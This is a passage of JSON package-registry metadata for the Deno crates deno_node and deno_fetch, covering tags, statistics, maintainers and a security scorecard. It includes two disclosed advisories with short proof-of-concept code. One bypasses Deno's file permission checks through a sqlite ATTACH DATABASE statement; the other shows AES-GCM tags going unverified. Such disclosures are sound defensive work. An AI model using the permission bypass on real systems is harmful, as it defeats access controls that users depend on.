1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T23:15:59.968Z","dependent_packages_count":9,"downloads":500996,"downloads_period":"total","dependent_repos_count":8,"rankings":{"downloads":6.475824881626313,"dependent_repos_count":8.357187166015203,"dependent_packages_count":3.8482522552148337,"stargazers_count":0.0022405114340766853,"forks_count":0.05750646014130159,"docker_downloads_count":6.790478681663616,"average":4.255248326015891},"purl":"pkg:cargo/deno_node","advisories":[{"uuid":"GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","url":"https://github.com/advisories/GHSA-8vxj-4cph-c596","title":"Deno has --allow-read / --allow-write permission bypass in `node:sqlite`","description":"## Summary\n\nIt is possible to bypass Deno's read/write permission checks by using `ATTACH DATABASE` statement.\n\n## PoC\n\n```js\n// poc.js\nimport { DatabaseSync } from \"node:sqlite\"\n\nconst db = new DatabaseSync(\":memory:\");\ndb.exec(\"ATTACH DATABASE 'test.db' as test;\");\n\ndb.exec(\"CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);\");\n```\n\n```\n$ deno poc.js\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:22:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596","https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860","https://nvd.nist.gov/vuln/detail/CVE-2025-48935","https://rustsec.org/advisories/RUSTSEC-2025-0138.html","https://github.com/advisories/GHSA-8vxj-4cph-c596"],"source_kind":"github","identifiers":["GHSA-8vxj-4cph-c596","CVE-2025-48935"],"repository_url":"https://github.com/denoland/deno","blast_radius":4.96699492845569,"created_at":"2025-06-04T22:08:12.441Z","updated_at":"2026-08-29T17:05:04.960Z","epss_percentage":0.00436,"epss_percentile":0.36137,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","packages":[{"ecosystem":"cargo","package_name":"deno_node","versions":[{"first_patched_version":"0.134.0","vulnerable_version_range":"\u003e= 0.129.0, \u003c 0.134.0"}],"purl":"pkg:cargo/deno_node"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.2.5","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.5"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","url":"https://github.com/advisories/GHSA-2x3r-hwv5-p32x","title":"Deno's AES GCM authentication tags are not verified","description":"### Summary\n\nThis affects AES-256-GCM and AES-128-GCM in Deno, introduced by commit [0d1beed](https://github.com/denoland/deno/commit/0d1beed). Specifically, the authentication tag is not being validated. This means tampered ciphertexts or incorrect keys might not be detected, which breaks the guarantees expected from AES-GCM. Older versions of Deno correctly threw errors in such cases, as does Node.js.\n\nWithout authentication tag verification, AES-GCM degrades to essentially CTR mode, removing integrity protection. Authenticated data set with set_aad is also affected, as it is incorporated into the GCM hash (ghash) but this too is not validated, rendering AAD checks ineffective.\n\n### PoC\n\n```ts\nimport { Buffer } from \"node:buffer\";\nimport {\n  createCipheriv,\n  createDecipheriv,\n  randomBytes,\n  scrypt,\n} from \"node:crypto\";\n\ntype Encrypted = {\n  salt: string;\n  iv: string;\n  enc: string;\n  authTag: string;\n};\n\nconst deriveKey = (key: string, salt: Buffer) =\u003e\n  new Promise\u003cBuffer\u003e((res, rej) =\u003e\n    scrypt(key, salt, 32, (err, k) =\u003e {\n      if (err) rej(err);\n      else res(k);\n    })\n  );\n\nasync function encrypt(text: string, key: string): Promise\u003cEncrypted\u003e {\n  const salt = randomBytes(32);\n  const k = await deriveKey(key, salt);\n\n  const iv = randomBytes(16);\n  const enc = createCipheriv(\"aes-256-gcm\", k, iv);\n  const ciphertext = enc.update(text, \"binary\", \"binary\") + enc.final(\"binary\");\n\n  return {\n    salt: salt.toString(\"binary\"),\n    iv: iv.toString(\"binary\"),\n    enc: ciphertext,\n    authTag: enc.getAuthTag().toString(\"binary\"),\n  };\n}\n\nasync function decrypt(enc: Encrypted, key: string) {\n  const k = await deriveKey(key, Buffer.from(enc.salt, \"binary\"));\n  const dec = createDecipheriv(\"aes-256-gcm\", k, Buffer.from(enc.iv, \"binary\"));\n\n  const out = dec.update(enc.enc, \"binary\", \"binary\");\n  dec.setAuthTag(Buffer.from(enc.authTag, \"binary\"));\n  return out + dec.final(\"binary\");\n}\n\nconst test = await encrypt(\"abcdefghi\", \"key\");\ntest.enc = \"\";\nconsole.log(await decrypt(test, \"\")); // no error\n```\n\n### Impact\n\nWhile discovered through experimentation, authentication failures that should raise errors may be silently ignored.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-06-04T20:48:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-2x3r-hwv5-p32x","https://nvd.nist.gov/vuln/detail/CVE-2025-24015","https://github.com/denoland/deno/commit/0d1beed2e3633d71d5e288e0382b85be361ec13d","https://github.com/denoland/deno/commit/4f27d7cdc02e3edfb9d36275341fb8185d6e99ed","https://github.com/denoland/deno/commit/a4003a5292bd0affefad3ecb24a8732886900f67","https://github.com/denoland/deno/commit/0d1beed","https://github.com/advisories/GHSA-2x3r-hwv5-p32x"],"source_kind":"github","identifiers":["GHSA-2x3r-hwv5-p32x","CVE-2025-24015"],"repository_url":"https://github.com/denoland/deno","blast_radius":6.953792899837965,"created_at":"2025-06-04T21:08:18.873Z","updated_at":"2026-08-29T17:05:06.110Z","epss_percentage":0.00265,"epss_percentile":0.17956,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","packages":[{"ecosystem":"cargo","package_name":"deno_node","versions":[{"first_patched_version":"0.125.0","vulnerable_version_range":"\u003e= 0.102.0, \u003c 0.125.0"}],"purl":"pkg:cargo/deno_node"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.1.7","vulnerable_version_range":"\u003e= 1.46.0, \u003c 2.1.7"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_node","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_node","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_node/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T05:39:01.038Z","updated_at":"2022-11-08T05:39:01.038Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:30.356Z","updated_at":"2023-07-18T22:41:30.356Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047423,"name":"deno_fetch","ecosystem":"cargo","description":"Fetch API implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":290,"first_release_published_at":"2020-09-18T20:41:28.335Z","latest_release_published_at":"2026-08-27T15:20:23.993Z","latest_release_number":"0.282.0","last_synced_at":"2026-09-01T09:18:06.148Z","created_at":"2022-04-12T10:00:23.322Z","updated_at":"2026-09-01T09:18:06.148Z","registry_url":"https://crates.io/crates/deno_fetch/","install_command":"cargo install deno_fetch","documentation_url":"https://docs.rs/deno_fetch/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: 